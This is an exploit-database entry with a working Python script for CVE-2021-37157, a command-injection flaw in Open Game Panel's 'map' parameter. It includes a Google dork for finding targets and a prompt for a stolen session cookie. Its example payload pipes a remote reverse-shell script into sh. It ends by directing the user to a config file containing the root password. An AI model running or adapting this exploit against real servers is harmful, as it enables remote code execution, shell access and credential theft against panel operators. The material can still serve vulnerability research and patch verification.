Exploit for Open Game Panel Remote Code Execution CVE-2021-37157

Name: Exploit for Open Game Panel Remote Code Execution CVE-2021-37157
Rating: 5 (261 reviews)
2021-10-04 | CVSS 0.0
## https://sploitus.com/exploit?id=PACKETSTORM:164368
# Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated)  
# Google Dork: intext:"Open Game Panel 2021"  
# Date: 08/14/2021  
# Exploit Author: prey  
# Vendor Homepage: https://www.opengamepanel.org/  
# Software Link: https://github.com/OpenGamePanel/OGP-Website  
# Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits)  
# Tested on: CentOS Linux 5.4.102  
  
#Before the patch, it was possible to inject system commands on "map" parameter when launching a new counter-strike server just by putting the command=  
betwen ';', the user needs to be authenticated for this.  
  
  
import requests  
  
banner = """  
@  
@ @@& @@@@@/  
@ @& #@@@@@& .=  
,/%@#  
@ @@@@@@@@@@@@@((%@@@@*  
@ #@@@@@@@@@@@@@@@*%@,  
@ @@@@@@@@@@@@@@&@@@@  
@ &@@@@@@@@@/ &@@@.  
@ @@@@@@@@@(  
@ @@@@@@@@@@@@@&*  
@ &@@@@@@@@@@@@@@@@%  
@ ,&@@@@@@@@@@@@@  
@ %@@@@@@@.  
@ .%@@@@@@@@% @@@@@@  
@ @@@@@# .&@@@@#  
@ (@@@@@@@@@@@. .@@@& @@%  
@ .@@@@@, #@@@@@* #@@@ @@@@@  
@ @@@& &@@@. @@@  
@ ,@@@ @@@@@@  
@ @@@ %@@@,  
@&@@ @@@,  
@@@@  
@@@@  
  
*@@@@@# @@ *@@ %@ @@@ @@ @@@@@/ @@@ @@@ ,@@@ ,@( .@=  
%  
*@/ @@ .@/ @(@ @@ @@@( @@ ,@( @@@* @#@@ @@(@ ,@( .@=  
%  
*@@@@@@ @@ @ &&.@( @@ @.@@ @@@@ @@.@(@ @@ (@. @@ ,@( .@=  
%  
*@/ %@(@ @@@ @@ *@@@ @@ @@ @@. @@ @@@@@@, ,@( .@=  
%  
*@/ @@* @@@ @@ %@@ @@@@@* @@ @@ &@ @@ ,@@@@@ .@=  
@@@@  
  
##You can get mod_id and home_id on your game panel URL when you are logged  
  
"""  
print(banner)  
  
target = input("Target url: (eg: https://panel.example.org)\n")  
opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n")  
mod_id = input("Mod_id value: (eg: 2437)\n")  
home_id = input("Home_id value: (eg: 3737)\n")  
server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n")  
command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n")  
  
url = target + "/home.php?m=gamemanager&p=game_monitor"  
cookies = {"opengamepanel_web": opengamepanel_web}  
headers = {"Content-Type": "application/x-www-form-urlencoded"}  
data = {"mod_id": mod_id, "home_id": home_id, "ip_port": server_ip_port, "map": ";" + command + ";", "start_server": "whatever"}  
try:  
requests.post(url, headers=headers, cookies=cookies, data=data)  
except:  
print("Something went wrong, check your inputs or try manually exploiting the map parameter")  
print("Finished. you can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")